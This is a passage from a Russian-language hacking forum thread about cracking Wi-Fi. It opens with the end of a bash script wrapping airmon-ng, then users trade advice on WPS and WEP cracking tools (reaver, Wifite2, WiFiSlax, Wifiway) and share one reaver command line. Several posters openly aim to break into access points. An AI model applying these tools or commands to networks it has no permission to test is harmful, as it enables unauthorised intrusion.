                      if [ ! -d $TMP ]; then mkdir -p $TMP; else rm -rf $TMP/*; fi
                      if [ ! -d $KEYS ]; then mkdir -p $KEYS; fi
                      if [ -d $HOME/Desktop/Wireless-Keys ]; then
                        if [ ! -d $HOME/Desktop/Wireless-Keys/$SCRIPT-keys ]; then
                          ln -s $KEYS $HOME/Desktop/Wireless-Keys/$SCRIPT-keys
                        fi
                      fi
                      
                      # Eliminating interfaces in monitor
                      interfaces=$(ifconfig|awk '/^mon/ {print $1}')
                      if [ "$interfaces" != "" ]; then
                        for monx in $interfaces; do
                          airmon-ng stop $monx up >/dev/null 2>&1
                        done
                      fi
                      
                      menu
                      
                      
                      Сохранить в файл bully.sh и запускать с консоли.
                       
                      1. Zheka

                        Zheka New Member

                        Joined:
                        29 Jan 2016
                        Messages:
                        45
                        Likes Received:
                        0
                        Reputations:
                        0
                        Кто подскажет, как взломать скрытую сеть?
                         
                        1. komicadze

                          komicadze New Member

                          Joined:
                          16 Dec 2016
                          Messages:
                          1
                          Likes Received:
                          0
                          Reputations:
                          0
                          Бью точку reaver ом на 90.91% trying pin выдаёт одно и тоже значение 99985677. В строке прописано reaver -I mom -b мак его -c 4 -p vc -a -5 поможите браузер дальше запустить
                           
                          1. maus

                            maus Active Member

                            Joined:
                            30 May 2015
                            Messages:
                            409
                            Likes Received:
                            102
                            Reputations:
                            0
                            - здесь собраны ошибки ищи: https://code.google.com/archive/p/reaver-wps/issues
                             
                            1. vadyok

                              vadyok New Member

                              Joined:
                              16 Mar 2017
                              Messages:
                              27
                              Likes Received:
                              0
                              Reputations:
                              0
                              Знатоки, пожалуйста подскажите, тема еще актуальная? Хочу взломать точки доступа с wps. Пробовал WiFiSlax64-1.0 с GOYScriptWPS (вскрыл две точки, но сигнал слабый) и Wifite2 - не вскрыл ни одной точки. Еще пробовал AirSlax 5.13 Base, тоже без результатно. Под Windows пробовал Dumpper и Wireless Air Cut - не вскрыли ни одну точку. Есть ли смысл пробовать Wifiway и с чего в ней лучше начать. Ей надо, чтобы на точке wps был включен или без разницы? Подскажите пожалуйста.
                               
                              1. Andrey9999

                                Andrey9999 Elder - Старейшина

                                Joined:
                                23 May 2012
                                Messages:
                                3,187
                                Likes Received:
                                31,486
                                Reputations:
                                72
                                Wifiway - это древняя версия WiFiSlax'а
                                 
                                vadyok likes this.
                                1. vadyok

                                  vadyok New Member

                                  Joined:
                                  16 Mar 2017
                                  Messages:
                                  27
                                  Likes Received:
                                  0
                                  Reputations:
                                  0
                                  Спасибо, большое за ответ. Сэкономили мне время.
                                   
                                  1. antis17

                                    antis17 Well-Known Member

                                    Joined:
                                    25 Apr 2017
                                    Messages:
                                    158
                                    Likes Received:
                                    1,231
                                    Reputations:
                                    5
                                    Если кому интересно, то появился Wifiway 3.5.
                                    http://foro.seguridadwireless.net/live-cd-wifiway/liberada-livecd-wifiway-3-5-version-final/
                                     
                                    scooter likes this.
                                    1. GeNT78

                                      GeNT78 New Member

                                      Joined:
                                      1 Feb 2014
                                      Messages:
                                      49
                                      Likes Received:
                                      0
                                      Reputations:
                                      0
                                      Кто нибудь устанавливал Wifiway 3.5 ? Что нового? Или стоит остановиться на WifiSlax'е
                                       
                                      1. valyat2

                                        valyat2 Banned

                                        Joined:
                                        8 Jul 2017
                                        Messages:
                                        40
                                        Likes Received:
                                        5
                                        Reputations:
                                        0
                                        Интересует программа wifite 2 или по другому
                                        vega.py v6.1 или выше версия
                                        есть ли у кого то новая версия от автора:
                                        ?
                                         
                                        #279 valyat2, 30 Jul 2017
                                        Last edited: 3 Aug 2017
                                        1. glestwid

                                          glestwid New Member

                                          Joined:
                                          30 Dec 2010
                                          Messages:
                                          91
                                          Likes Received:
                                          1
                                          Reputations:
                                          0
                                          Подскажите, а есть какое-то приложение под Андроид >= 4 для подбора WEP? Именно специализированное для WEP.
                                           
                                          Loading...